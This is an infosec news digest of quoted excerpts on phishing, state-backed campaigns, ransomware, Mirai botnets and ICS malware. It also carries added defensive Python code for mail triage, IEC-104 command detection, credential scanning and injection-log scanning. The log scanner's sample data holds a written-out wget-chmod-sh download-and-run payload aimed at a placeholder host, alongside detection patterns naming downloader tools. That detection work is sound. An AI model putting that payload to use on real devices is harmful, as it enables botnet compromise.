InfoSec News 20230526
Top News
-
Microsoft 365 phishing attacks use encrypted RPMSG messages
"Attackers are now using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts to steal Microsoft credentials in targeted phishing attacks designed to evade detection by email security gateways.
RPMSG files (also known as restricted permission message files) are encrypted email message attachments created using Microsoft's Rights Management Services (RMS) and offer an extra layer of protection to sensitive info by restricting access to authorized recipients.
Recipients who want to read them must authenticate using their Microsoft account or obtain a one-time passcode to decrypt the contents.
As Trustwave recently discovered, RPMSG's authentication requirements are now being exploited to trick targets into handing over their Microsoft credentials using fake login forms."
TLP1 : Green
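A mail-filtering check a defender could add on the back of the excerpt above, written here as an added example and not taken from Trustwave's report: it parses a message, lists attachments that are RPMSG containers (matched by the .rpmsg extension or by the application/x-microsoft-rpmsg-message MIME type, which is assumed here), and holds the message for review when the sender is outside the organisation's own domains (example.org is a constructed placeholder). The sample messages are built inline with dummy attachment bytes, not real RMS-protected content:

```python
"""Hold inbound mail that carries RPMSG (rights-protected) attachments from external senders."""
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr
from typing import Dict, List

# Assumed MIME type for message.rpmsg attachments; the extension check below is the fallback.
RPMSG_MIME = "application/x-microsoft-rpmsg-message"
# Constructed placeholder: the receiving organisation's own mail domains.
ORG_DOMAINS = {"example.org"}


def rpmsg_attachments(raw: bytes) -> List[str]:
    """Return the filenames of attachments that are RPMSG containers, by MIME type or extension."""
    msg = message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == RPMSG_MIME or name.endswith(".rpmsg"):
            hits.append(name or "<unnamed>")
    return hits


def sender_domain(raw: bytes) -> str:
    """Domain of the From: address (the header-level sender; SPF/DKIM results are out of scope here)."""
    msg = message_from_bytes(raw, policy=policy.default)
    addr = parseaddr(str(msg.get("From", "")))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage(raw: bytes) -> Dict:
    """Hold for review when an RPMSG attachment arrives from a sender outside ORG_DOMAINS."""
    hits = rpmsg_attachments(raw)
    domain = sender_domain(raw)
    external = domain not in ORG_DOMAINS
    return {"sender_domain": domain, "external": external, "rpmsg": hits,
            "hold_for_review": bool(hits) and external}


def build_sample(sender: str, with_rpmsg: bool) -> bytes:
    """Constructed sample message; the attachment body is dummy bytes, not a real RPMSG container."""
    m = EmailMessage()
    m["From"] = sender
    m["To"] = "finance@example.org"
    m["Subject"] = "Protected message"
    m.set_content("You have received a protected message. Open the attachment to read it.")
    if with_rpmsg:
        m.add_attachment(b"\x00constructed-dummy-rpmsg-bytes", maintype="application",
                         subtype="x-microsoft-rpmsg-message", filename="message.rpmsg")
    return m.as_bytes()


if __name__ == "__main__":
    for sender, flag in [("Alice <alice@partner.example>", True), ("it@example.org", True)]:
        print(sender, "->", triage(build_sample(sender, flag)))
```

The signal is the pairing of an external sender with an attachment the gateway cannot inspect; an organisation that legitimately exchanges RMS-protected mail with partners would add those partner domains to ORG_DOMAINS rather than block the format outright.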
-
CISO Criminalization, Vague Cyber Disclosure Rules Create Angst for Security Teams
"Getting cybersecurity incident disclosure right can mean the difference between prison and freedom. But the rules remain woefully vague.
Chief information security officers (CISOs) and their teams know there's a certain amount of risk intrinsically baked into the job. But the recent sentencing of former Uber CISO Joseph Sullivan for his role in covering up a 2016 data breach at the company has significantly upped the ante.
SolarWinds CISO Tim Brown survived one of the most spectacular security breaches in history in 2020 in an epic supply chain attack, and emerged on the other side with the business — and his professional reputation — intact. In an interview with Dark Reading, he explained that CISOs are asking for clarity on rules around disclosures. The Federal Trade Commission (FTC) has rules, and beyond that, there is a vast and evolving mousetrap of rules, regulations, executive orders, and case law dictating how and when disclosures need to occur, and that's before anyone considers the impact of an incident on the business."
TLP1 : Green
Cybersecurity State: Surveillance, Cyberwarfare, Cybercriminality and Hacktivism
-
'Volt Typhoon' Breaks Fresh Ground for China-Backed Cyber Campaigns
"News this week that a likely China-backed threat actor is targeting critical infrastructure organizations in Guam has once again raised the specter of America's geopolitical adversaries launching disruptive cyberattacks against key communications and operational technologies in a future crisis.
The attacks are part of a broader campaign dubbed "Volt Typhoon" that Microsoft reported this week as targeting organizations in the communications, government, utility, manufacturing, maritime, and other critical sectors. Like most state-backed Chinese cyber campaigns over the past several years, the primary focus of Volt Typhoon at first appears to be cyber espionage."
TLP1 : Green
-
Organizations Worldwide Targeted in Rapidly Evolving Buhti Ransomware Operation
"A recently identified ransomware operation called Buhti is using LockBit and Babuk variants to target both Linux and Windows systems, Symantec reports.
Initially observed in February 2023, the Buhti operation, which Symantec calls Blacktail, has been rapidly expanding since mid-April, exploiting recent vulnerabilities for initial access, and relying on a custom tool to steal victim files.
In a recent attack, the Buhti operators used a minimally modified version of the LockBit 3.0 (LockBit Black) ransomware to target Windows machines. The builder for LockBit leaked online in September 2022.
Previously, the operators were seen targeting Linux systems with the Golang-based variants of Babuk, the first ransomware to target ESXi systems. Babuk’s code leaked online in 2021."
TLP1 : Green
Breaches: Data Breaches and Hacks
-
Zyxel Firewalls Hacked by Mirai Botnet via Recently Patched Vulnerability
"The Taiwan-based networking device manufacturer informed customers about the security hole on April 25, when it announced the availability of patches for impacted ATP, VPN, USG Flex and ZyWALL/USG firewalls.
The OS command injection vulnerability, found by Trapa Security, is caused by improper error message handling in some firewalls, and it could allow an unauthenticated attacker to remotely execute OS commands by sending specially crafted packets to the targeted device."
TLP1 : Green
Vulnerabilities: Vulnerability Advisories, Zero-Days, Patches and Exploits
-
D-Link fixes auth bypass and RCE flaws in D-View 8 software
"D-Link has fixed two critical-severity vulnerabilities in its D-View 8 network management suite that could allow remote attackers to bypass authentication and execute arbitrary code.
D-View is a network management suite developed by the Taiwanese networking solutions vendor D-Link, used by businesses of all sizes for monitoring performance, controlling device configurations, creating network maps, and generally making network management and administration more efficient and less time-consuming.
Security researchers participating in Trend Micro's Zero Day Initiative (ZDI) discovered six flaws impacting D-View late last year and reported them to the vendor on December 23, 2022.
Two of the discovered vulnerabilities are critical severity (CVSS score: 9.8) and give unauthenticated attackers strong leverage over affected installations."
TLP1 : Green
-
New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids
"A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed.
Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to a public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild.
"The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.
COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc."
TLP1 : Green
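The excerpt above names IEC-104 as the protocol COSMICENERGY speaks to RTUs. The following is an added example, written here and not code from Mandiant or from the malware itself, that decodes IEC 60870-5-104 APDUs from a TCP byte stream and flags process-control commands (type IDs 45 to 51 and 58 to 64 with cause of transmission "activation"), the traffic a monitor on an OT segment would alert on when it comes from a client that is not a known controlling station. The byte stream is constructed for the example, not a capture; the standard IEC-104 field sizes (2-byte cause of transmission, 2-byte common address, 3-byte information object address) are assumed:

```python
"""Minimal IEC 60870-5-104 APDU decoder that flags process-control commands."""
from dataclasses import dataclass
from typing import List, Optional

# ASDU type identifiers in the control direction (the commands an attacker would issue to an RTU).
CONTROL_TYPE_IDS = {
    45: "C_SC_NA_1 single command", 46: "C_DC_NA_1 double command",
    47: "C_RC_NA_1 regulating step command", 48: "C_SE_NA_1 set-point normalized",
    49: "C_SE_NB_1 set-point scaled", 50: "C_SE_NC_1 set-point float",
    51: "C_BO_NA_1 bitstring command",
    58: "C_SC_TA_1 single command (time tag)", 59: "C_DC_TA_1 double command (time tag)",
    60: "C_RC_TA_1 regulating step (time tag)", 61: "C_SE_TA_1 set-point normalized (time tag)",
    62: "C_SE_TB_1 set-point scaled (time tag)", 63: "C_SE_TC_1 set-point float (time tag)",
    64: "C_BO_TA_1 bitstring command (time tag)",
}
COT_ACTIVATION = 6  # cause of transmission: activation (a command being issued, not confirmed)
U_FUNCTIONS = {0x07: "STARTDT act", 0x0B: "STARTDT con", 0x13: "STOPDT act",
               0x23: "STOPDT con", 0x43: "TESTFR act", 0x83: "TESTFR con"}


@dataclass
class Apdu:
    fmt: str                          # "I" (data), "S" (acknowledge) or "U" (link control)
    send_seq: Optional[int] = None
    recv_seq: Optional[int] = None
    u_function: Optional[str] = None
    type_id: Optional[int] = None
    cot: Optional[int] = None
    common_addr: Optional[int] = None
    ioa: Optional[int] = None
    element: bytes = b""
    is_control_command: bool = False


def parse_stream(data: bytes) -> List[Apdu]:
    """Split a byte stream into APDUs: start byte 0x68, length, then `length` bytes (4 control + ASDU)."""
    apdus, i = [], 0
    while i < len(data):
        if i + 2 > len(data) or data[i] != 0x68:
            raise ValueError(f"bad or truncated APDU header at offset {i}")
        length = data[i + 1]
        body = data[i + 2:i + 2 + length]
        if length < 4 or len(body) != length:
            raise ValueError(f"truncated APDU at offset {i}")
        apdus.append(parse_apdu(body))
        i += 2 + length
    return apdus


def parse_apdu(body: bytes) -> Apdu:
    c1, c2, c3, c4 = body[:4]
    if c1 & 0x01 == 0:                      # I-format: bit 0 of control octet 1 clear
        a = Apdu("I", send_seq=(c1 >> 1) | (c2 << 7), recv_seq=(c3 >> 1) | (c4 << 7))
        _parse_asdu(a, body[4:])
        return a
    if c1 & 0x03 == 0x01:                   # S-format: bits 0-1 == 01
        return Apdu("S", recv_seq=(c3 >> 1) | (c4 << 7))
    return Apdu("U", u_function=U_FUNCTIONS.get(c1, f"unknown 0x{c1:02x}"))


def _parse_asdu(a: Apdu, asdu: bytes) -> None:
    # IEC-104 fixed sizes: 2-byte cause of transmission, 2-byte common address, 3-byte IOA.
    if len(asdu) < 9:
        raise ValueError("ASDU too short")
    a.type_id = asdu[0]
    a.cot = asdu[2] & 0x3F                  # bit 6 = negative confirm, bit 7 = test flag
    a.common_addr = asdu[4] | (asdu[5] << 8)
    a.ioa = asdu[6] | (asdu[7] << 8) | (asdu[8] << 16)
    a.element = bytes(asdu[9:])
    a.is_control_command = a.type_id in CONTROL_TYPE_IDS and a.cot == COT_ACTIVATION


def describe(a: Apdu) -> str:
    if a.fmt != "I":
        return f"{a.fmt}-format {a.u_function or ''}".strip()
    text = (f"type {a.type_id} ({CONTROL_TYPE_IDS.get(a.type_id, 'non-control')}) "
            f"cot={a.cot} ca={a.common_addr} ioa={a.ioa}")
    if a.type_id in (45, 58) and a.element:  # single command: SCO bit 0 = ON/OFF, bit 7 = select/execute
        sco = a.element[0]
        text += f" SCO={'ON' if sco & 1 else 'OFF'}/{'select' if sco & 0x80 else 'execute'}"
    return text


def control_commands(apdus: List[Apdu]) -> List[Apdu]:
    return [a for a in apdus if a.is_control_command]


# Constructed sample exchange (not a capture): STARTDT, a single command switching IOA 1000 ON,
# a station interrogation, then an S-format acknowledgement.
SAMPLE_STREAM = bytes.fromhex(
    "68 04 07 00 00 00"
    "68 0E 00 00 00 00 2D 01 06 00 01 00 E8 03 00 01"
    "68 0E 02 00 00 00 64 01 06 00 01 00 00 00 00 14"
    "68 04 01 00 02 00"
)

if __name__ == "__main__":
    for apdu in parse_stream(SAMPLE_STREAM):
        print(("ALERT " if apdu.is_control_command else "      ") + describe(apdu))
```

A decoder like this only ranks frames; whether a single command to IOA 1000 is an attack depends on which hosts are allowed to issue commands, so a practical deployment pairs it with an allowlist of controlling-station addresses and alerts on commands from anything else.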
Incident Response: Infrastructure, Training, SIEM and Incident Handling
-
Security Pros: Before You Do Anything, Understand Your Threat Landscape
"Regardless of the use case your security organization is focused on – alert triage, threat hunting, spear phishing, incident response, or risk-based vulnerability management, to name a few – you’ll likely waste time and resources and make poor decisions if you don’t start with understanding your threat landscape. What do I mean by that?
As security professionals our tendency is to start with the great unknown – all the threat feeds and sources of external threat data available that combine to form the threat universe. The problem with starting there is that you quickly end up with a big data problem – an overwhelming amount of data from the multiple sources your organization subscribes to – commercial, open source, government, industry, existing security vendors – as well as frameworks like MITRE ATT&CK. Not to mention RSS feeds, news websites, research blogs, and GitHub repositories that analysts use to keep up with emerging threat information and trends."
TLP1 : Green
-
Watch Now: Threat Detection and Incident Response Virtual Summit
"All sessions from SecurityWeek’s Threat Detection & Incident Response Summit are now available to watch on demand.
This fully immersive online event brought together security practitioners from around the world to share war stories on breaches and the murky world of high-end cyberattacks."
TLP1 : Green
Technical Articles: Forensics, Reverse Engineering, Malware, Phishing, Pentesting, Software Security and Cryptography
-
Mercenary mayhem: A technical analysis of Intellexa's PREDATOR spyware
"We would like to thank The Citizen Lab for their cooperation, support and inputs into this research.
Commercial spyware use is on the rise, with actors leveraging these sophisticated tools to conduct surveillance operations against a growing number of targets. Cisco Talos has new details of a commercial spyware product sold by the spyware firm Intellexa (formerly known as Cytrox).
Our research specifically looks at two components of this mobile spyware suite known as “ALIEN” and “PREDATOR,” which compose the backbone of the spyware implant. Our findings include an in-depth walkthrough of the infection chain, including the implants’ various information-stealing capabilities.
A deep dive into both spyware components indicates that ALIEN is more than just a loader for PREDATOR and actively sets up the low-level capabilities needed for PREDATOR to spy on its victims.
We assess with high confidence that the spyware has two additional components — tcore (main component) and kmem (privilege escalation mechanic) — but we were unable to obtain and analyze these modules.
If readers suspect their system(s) may have been compromised by commercial spyware, please consider notifying Talos’ research team at talos-mercenary-spyware-help@external.cisco.com to assist in furthering the community’s knowledge of these threats."
TLP1 : Green
-
NCC Group Releases Open Source Tools for Developers, Pentesters
"Cybersecurity firm NCC Group has released new open source tools that can be useful to application developers and penetration testers.
The first, named Code Credential Scanner (css), can be used by developers to scan configuration files in a repository to detect any stored credentials and remove them before they are leaked.
The tool runs on a local filesystem, meaning that it can be executed at any time to scan local files. It can also be integrated into development mechanisms to perform automated scheduled scans."
TLP1 : Green
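As an added illustration of what a repository credential scanner does (my own code, not NCC Group's Code Credential Scanner, whose rules and file filters are not reproduced here), the following walks a checkout for configuration files, applies a small set of regexes, and uses template-syntax and Shannon-entropy checks to drop placeholder values so that only real-looking secrets are reported. The sample .env and YAML contents are constructed; the AWS access key ID is the value AWS uses in its documentation, not a live key:

```python
"""Walk a repository for configuration files and report values that look like stored credentials."""
import math
import os
import re
import tempfile
from collections import Counter
from typing import Dict, List

# Constructed detection rules: a fixed-format key ID, a key-block header, and a generic
# "<name containing password/secret/token>=<value>" assignment (key name in group 1, value in group 2).
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    "generic_assignment": re.compile(
        r"(?i)([A-Z0-9_.-]*(?:password|passwd|secret|api[_-]?key|token)[A-Z0-9_.-]*)"
        r"\s*[:=]\s*['\"]?([^\s'\"]{8,})"),
}
# Values that are references to be filled in at deploy time, not secrets: ${VAR}, $VAR, {{ var }}, <x>, %x%
PLACEHOLDER = re.compile(r"^(\$\{.*\}|\$[A-Z_][A-Z0-9_]*|\{\{.*\}\}|<.*>|%.*%)$")
MIN_ENTROPY = 3.0  # bits per character; weeds out "changeme"-style values for the generic rule only
CONFIG_EXTS = {".env", ".yml", ".yaml", ".json", ".ini", ".cfg", ".conf", ".properties", ".toml", ".xml"}


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(text: str, path: str = "<memory>") -> List[Dict]:
    """Apply every rule to every line; suppress template references and low-entropy generic matches."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, pat in PATTERNS.items():
            for m in pat.finditer(line):
                value = m.group(m.lastindex) if m.lastindex else m.group(0)
                if PLACEHOLDER.match(value):
                    continue
                entropy = shannon_entropy(value)
                if rule == "generic_assignment" and entropy < MIN_ENTROPY:
                    continue
                findings.append({"path": path, "line": lineno, "rule": rule,
                                 "key": m.group(1) if m.lastindex else None,
                                 "entropy": round(entropy, 2)})
    return findings


def scan_tree(root: str) -> List[Dict]:
    """Scan config-like files under root, skipping VCS and dependency directories."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in {".git", "node_modules"}]
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            if ext in CONFIG_EXTS or name.startswith(".env"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    findings.extend(scan_text(fh.read(), os.path.relpath(full, root)))
    return findings


SAMPLE_ENV = """\
# constructed sample .env file (real-looking, templated and placeholder values)
DB_HOST=db.internal
DB_PASSWORD=Tr0ub4dor&3xyz
API_TOKEN=${API_TOKEN}
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
ADMIN_PASSWORD=changeme
"""

SAMPLE_YAML = """\
# constructed sample deploy config with an embedded key block (body shortened)
tls_key: |
  -----BEGIN RSA PRIVATE KEY-----
  MIIEpAIBAAKCAQEAconstructedbody
  -----END RSA PRIVATE KEY-----
"""


def demo() -> List[Dict]:
    """Write the constructed samples into a temporary tree and scan it like a repository checkout."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, ".env"), "w") as fh:
            fh.write(SAMPLE_ENV)
        os.mkdir(os.path.join(root, "deploy"))
        with open(os.path.join(root, "deploy", "prod.yaml"), "w") as fh:
            fh.write(SAMPLE_YAML)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}:{f['line']} {f['rule']} key={f['key']} entropy={f['entropy']}")
```

The entropy gate is what keeps a scanner like this usable in CI: without it every `password=changeme` in a sample config is a finding, and developers learn to ignore the output. Run on a pre-commit hook it catches the secret before it is pushed; run on history it only tells you what to rotate.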
-
Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices
"On April 10, Unit 42 researchers observed a Mirai variant called IZ1H9, which used several vulnerabilities to spread itself. The threat actors use the following vulnerabilities to target exposed servers and networking devices running Linux:
CVE-2023-27076: Tenda G103 command injection vulnerability
CVE-2023-26801: LB-Link command injection vulnerability
CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerability
Compromised devices can be fully controlled by attackers and become a part of the botnet. Those devices can be used to conduct further attacks, such as distributed denial-of-service (DDoS) attacks."
TLP1 : Green
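The variant described above spreads by sending command-injection payloads to exposed device web interfaces. As an added example (written here, not Unit 42's code, and not tied to the listed CVEs, whose request formats the excerpt does not give), this script scans web-server access logs for the shape of those payloads: a shell metacharacter followed by a downloader, command substitution, chmod of a dropper, a busybox or sh invocation, and staging in /tmp. The log lines are constructed for the example using RFC 5737 documentation addresses, and the marker list is a heuristic, not a signature set:

```python
"""Flag HTTP requests carrying OS command-injection payloads of the kind IoT botnet loaders use."""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Common log format: client, identity, user, [timestamp], "METHOD path PROTOCOL", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')

# Constructed heuristics: each pattern is applied to the decoded request path and query.
INJECTION_MARKERS = [
    (re.compile(r"[;&|`]\s*(?:wget|curl|tftp|ftpget|busybox)\b"), "download-and-run chain"),
    (re.compile(r"\$\([^)]*\)"), "command substitution"),
    (re.compile(r"\bchmod\s+(?:\+x|7[0-7]{2})\b"), "mark dropper executable"),
    (re.compile(r"/bin/(?:busybox|sh)\b"), "shell or busybox invocation"),
    (re.compile(r"(?:^|[;&|`\s])(?:rm|cd)\s+/tmp\b"), "staging in /tmp"),
]


def decode_path(path: str) -> str:
    """Decode percent-encoding twice (to catch double encoding) and '+' so payloads read as typed."""
    return unquote_plus(unquote_plus(path))


def scan_log_line(line: str) -> Dict:
    """Parse one access-log line; return {} if it does not parse, else the request plus matched markers."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    decoded = decode_path(m.group("path"))
    reasons = [label for pat, label in INJECTION_MARKERS if pat.search(decoded)]
    return {"ip": m.group("ip"), "method": m.group("method"), "path": decoded,
            "status": int(m.group("status")), "reasons": reasons}


def scan_log(text: str) -> List[Dict]:
    """Return only the requests that matched at least one marker, in log order."""
    flagged = []
    for line in text.splitlines():
        hit = scan_log_line(line)
        if hit and hit["reasons"]:
            flagged.append(hit)
    return flagged


# Constructed sample log: one benign page load, a download-and-run chain injected through a CGI
# parameter, a command-substitution probe, and a benign search that merely mentions wget.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2023:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.7 - - [10/Apr/2023:12:00:02 +0000] "POST /cgi-bin/config.cgi?cmd=%60cd+/tmp;wget+http://198.51.100.9/x.sh;chmod+777+x.sh;sh+x.sh%60 HTTP/1.1" 200 48
198.51.100.8 - - [10/Apr/2023:12:00:03 +0000] "GET /setup.cgi?ip=192.0.2.1%24(id) HTTP/1.1" 404 0
192.0.2.11 - - [10/Apr/2023:12:00:04 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['method']} {hit['status']} {hit['reasons']}\n    {hit['path']}")
```

Note that the benign search containing the word "wget" is not flagged, because the first marker requires a shell metacharacter before the downloader; that is the difference between a keyword grep and a detection you can leave running. A 404 on the probe line is still worth keeping: the request tells you which device-specific endpoints are being sprayed at your address space even when the targeted firmware is not present.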
1 Traffic Light Protocol (TLP) [1] for information sharing:
- Red: Not for disclosure, restricted to participants only.
- Amber: Limited disclosure, restricted to participants' organizations.
- Green: Limited disclosure, restricted to the community.